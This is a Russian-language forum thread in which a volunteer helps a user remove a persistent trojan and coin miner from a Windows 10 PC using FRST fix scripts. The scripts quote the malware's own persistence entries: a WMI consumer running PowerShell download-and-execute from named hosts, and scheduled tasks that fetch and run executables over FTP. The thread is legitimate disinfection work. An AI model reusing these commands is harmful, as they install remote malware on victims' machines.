Trojan:Win32/Powemet.A!attk

@maxim_trappin · Регистрация: 23.04.2022

Студворк — интернет-сервис помощи студентам

Приветствую. Столкнулся со следующим вирусом - Trojan:Win32/Powemet.A!attk. Оказывается, уже чуть меньше месяца гуляет по системе, но обнаружил его только пару дней назад. Windows Defender успешно его находит, при попытке удаления это происходит лишь с 3-4 раза, но при перезагрузке вирус вновь обнаруживается. Стоит Windows 10. Loaris Trojan Remover пробовал, но не помогает. Логи прикрепляю.

@maxim_trappin · 23.04.2022, 13:47 **[ТС]**

Приветствую. Обнаружил при помощи LoarisTrojanRemover у себя майнер, кажется, - Risk.FPL.CoinMiner.dd. Пытался его удалить через эту же прогу, но он вновь всплывает. Скорее всего попал ко мне на пк после скачивания настолки для компании на ПК отсюда - [ссылка]
Trojan:Win32/Powemet.A!attk - другая моя тема с трояном. Логи предоставляю.
Прошу помощи. Заранее спасибо!

@maxim_trappin · 23.04.2022, 13:52 **[ТС]**

https://www.cyberforum.ru/viru... 74328.html - другая моя тема с майнером (возможно майнер)

@Sandor · 24.04.2022, 16:46

Здравствуйте!

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe
В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

@Sandor · 24.04.2022, 16:47

Здравствуйте!

Сообщение от maxim_trappin

другая моя тема

Это разные компьютеры или один и тот же?

@maxim_trappin · 24.04.2022, 19:13 **[ТС]**

Да, один и тот же пк. В теме с трояном скину все данные. Подумал, что для разных проблем стоит создать разные темы

@maxim_trappin · 24.04.2022, 20:34 **[ТС]**

вот все файлы

@maxim_trappin · 24.04.2022, 20:35 **[ТС]**

в теме с трояном скинул файлы! на всякий случай вот они ещё раз

@Sandor · 26.04.2022, 12:50

Сообщение от maxim_trappin

Подумал, что для разных проблем стоит создать разные темы

Нет. Темы объединены.

Дополнительно:
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте в архив).
Подробнее читайте в этом руководстве.

@maxim_trappin · 28.04.2022, 16:26 **[ТС]**

Скачал, сделал всё, как Вы описали. Архив с отчётами прикрепляю.

@Sandor · 28.04.2022, 16:35

Через Панель управления (Параметры) - Удаление программ (Приложения) - удалите нежелательное ПО:

Bonjour

Далее:
Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

Отключите до перезагрузки антивирус.

Выделите следующий код:

Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Start::
SystemRestore: On
CreateRestorePoint:
RemoveProxy:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-177854217-72813761-2326009682-1001\...\MountPoints2: {3ed21387-f810-11ea-aeb7-00d86184eef6} - "E:\SISetup.exe" 
HKU\S-1-5-21-177854217-72813761-2326009682-1001\...\MountPoints2: {4b04e2b5-4f37-11eb-aee8-00d86184eef6} - "V:\autorun.exe" 
HKU\S-1-5-21-177854217-72813761-2326009682-1001\...\MountPoints2: {50b5f2c0-4f46-11eb-aeea-00d86184eef6} - "V:\auto.exe" 
HKU\S-1-5-21-177854217-72813761-2326009682-1001\...\MountPoints2: {670d7df0-4f41-11eb-aee9-00d86184eef6} - "V:\autorun.exe" 
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
AutoConfigURL: [{BB21315F-FB77-4F81-9B68-2FCBA0FB166E}] => hxxps://proxy.bmstu.ru/
AutoConfigURL: [S-1-5-21-177854217-72813761-2326009682-1001] => hxxps://proxy.bmstu.ru/
C:\Users\sania\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"tosa4\"",Filter="__EventFilter.Name=\"tosa3\"::
WMI:subscription\__EventFilter->tosa3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10500 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->tosa4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.webpublicservices.org:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadStri (запись имеет ещё 410 символов).]
FirewallRules: [{838C9B52-C1EC-4036-A3B3-C5EFC3C5D17C}] => (Allow) C:\Users\sania\MediaGet2\mediaget.exe => Нет файла
FirewallRules: [{51F25400-02A1-4BDD-A4CC-1E32A1B0D317}] => (Allow) C:\Users\sania\MediaGet2\mediaget.exe => Нет файла
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
cmd: del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*"
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

@maxim_trappin · 28.04.2022, 16:45 **[ТС]**

Подскажите, при удалении программы Bonjour через Установку и удаление программ, деинсталлятор предлагает закрыть NVIDIA Geforce Overlay (и эту ссылку, соответственно, но всё ещё дефолтный антивирус винды включён). Это безопасно? И это сделать, выключив "Настройки NVIDIA" в трее? 10 винда, если что

@Sandor · 28.04.2022, 16:46

Да, безопасно.

@maxim_trappin · 28.04.2022, 17:14 **[ТС]**

готово

@Sandor · 29.04.2022, 09:30

Виноват, пропустил некоторые вредоносные записи. Ещё один небольшой скрипт выполните, пожалуйста:

Отключите до перезагрузки антивирус.

Выделите следующий код:

Code
1
2
3
4
5
6
7
Start::
SystemRestore: On
CreateRestorePoint:
Task: {9F532062-2817-47BE-8225-12455FE3CCE8} - System32\Tasks\AdobeUpdateFlac2 => cmd /c echo open ftp2.webpublicservices.org>>ps&echo test>>ps&echo 1433>>ps&echo get c.rar c:\windows\help\AdobeFlac.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\AdobeFlac.exe
Task: {CC548F82-6396-4042-BEDF-91FA41075FE1} - System32\Tasks\AdobeUpdateFlac => cmd /c echo open ftp2.ha7455h6fi1.net>>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

@maxim_trappin · 29.04.2022, 13:17 **[ТС]**

прикрепляю новый fix log

@Sandor · 29.04.2022, 13:19

Спасибо.
Что сейчас с проблемой?

@maxim_trappin · 29.04.2022, 13:20 **[ТС]**

только запустил windows defender и Loaris Trojan Remover, проверяю. напишу после проверки!

@Sandor · 29.04.2022, 13:24

Сообщение от maxim_trappin

Loaris Trojan Remover

Этот можете не запускать, нет доверия к сей поделке.

@maxim_trappin · 29.04.2022, 13:27 **[ТС]**

я перезагрузил ноут вновь и сразу не стал ругаться антивирус
Trojan:Win32/Powemet.A!attk снова всплыл, к сожалению(
хотя стал удаляться с первого раза в windows defender

Новые блоги и статьи Все статьи Все блоги /
Знаешь почему 90% людей редко бывают счастливыми? kumehtar 14.04.2026 Потому что они ждут. Ждут выходных, ждут отпуска, ждут удачного момента. . . а удачный момент так и не приходит.	Фиксация колонок в отчете СКД Maks 14.04.2026 Фиксация колонок в СКД отчета типа Таблица. Задача: зафиксировать три левых колонки в отчете. Процедура ПриКомпоновкеРезультата(ДокументРезультат, ДанныеРасшифровки, СтандартнаяОбработка) / / . . .	Настройки VS Code Loafer 13.04.2026 { "cmake. configureOnOpen": false, "diffEditor. ignoreTrimWhitespace": true, "editor. guides. bracketPairs": "active", "extensions. ignoreRecommendations": true, . . .	Оптимизация кода на разграничение прав доступа к элементам формы Maks 13.04.2026 Алгоритм из решения ниже реализован на нетиповом документе, разработанного в конфигурации КА2. Задачи, как таковой, поставлено не было, проделанное ниже исключительно моя инициатива. Было так:. . .
Контроль заполнения и очистка дат в зависимости от значения перечислений Maks 12.04.2026 Алгоритм из решения ниже реализован на примере нетипового документа "ПланированиеПерсонала", разработанного в конфигурации КА2. Задача: реализовать контроль корректности заполнения дат назначения. . .	Архитектура слоя интернета для сервера-слоя. Hrethgir 11.04.2026 В продолжение https:/ / www. cyberforum. ru/ blogs/ 223907/ 10860. html Знаешь что я подумал? Раз мы все источники пишем в голове ветки, то ничего не мешает добавить в голову такой источник, который сам. . .	Подстановка значения реквизита справочника в табличную часть документа Maks 10.04.2026 Алгоритм из решения ниже реализован на примере нетипового документа "ПланированиеПерсонала", разработанного в конфигурации КА2. Задача: при выборе сотрудника (справочник Сотрудники) в ТЧ документа. . .	Очистка реквизитов документа при копировании Maks 09.04.2026 Алгоритм из решения ниже применим как для типовых, так и для нетиповых документов на самых различных конфигурациях. Задача: при копировании документа очищать определенные реквизиты и табличную. . .

@maxim_trappin 1 / 1 / 0 Регистрация: 23.04.2022 Сообщений: 21
	23.04.2022, 13:52 [ТС]
	https://www.cyberforum.ru/viru... 74328.html - другая моя тема с майнером (возможно майнер) 0

@Sandor 22499 / 15944 / 3089 Регистрация: 08.10.2012 Сообщений: 64,968
	24.04.2022, 16:46
	Здравствуйте! Скачайте AV block remover. Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению. После перезагрузки системы соберите новый CollectionLog Автологером. 1

@maxim_trappin 1 / 1 / 0 Регистрация: 23.04.2022 Сообщений: 21
	24.04.2022, 19:13 [ТС]
	Да, один и тот же пк. В теме с трояном скину все данные. Подумал, что для разных проблем стоит создать разные темы 0

@maxim_trappin 1 / 1 / 0 Регистрация: 23.04.2022 Сообщений: 21
	28.04.2022, 16:45 [ТС]
	Подскажите, при удалении программы Bonjour через Установку и удаление программ, деинсталлятор предлагает закрыть NVIDIA Geforce Overlay (и эту ссылку, соответственно, но всё ещё дефолтный антивирус винды включён). Это безопасно? И это сделать, выключив "Настройки NVIDIA" в трее? 10 винда, если что 0

@Sandor 22499 / 15944 / 3089 Регистрация: 08.10.2012 Сообщений: 64,968
	28.04.2022, 16:46
	Да, безопасно. 1

@Sandor 22499 / 15944 / 3089 Регистрация: 08.10.2012 Сообщений: 64,968
	29.04.2022, 13:19
	Спасибо. Что сейчас с проблемой? 1

@maxim_trappin 1 / 1 / 0 Регистрация: 23.04.2022 Сообщений: 21
	29.04.2022, 13:20 [ТС]
	только запустил windows defender и Loaris Trojan Remover, проверяю. напишу после проверки! 0

@maxim_trappin 1 / 1 / 0 Регистрация: 23.04.2022 Сообщений: 21
	29.04.2022, 13:27 [ТС]
	я перезагрузил ноут вновь и сразу не стал ругаться антивирус Trojan:Win32/Powemet.A!attk снова всплыл, к сожалению( хотя стал удаляться с первого раза в windows defender Миниатюры 0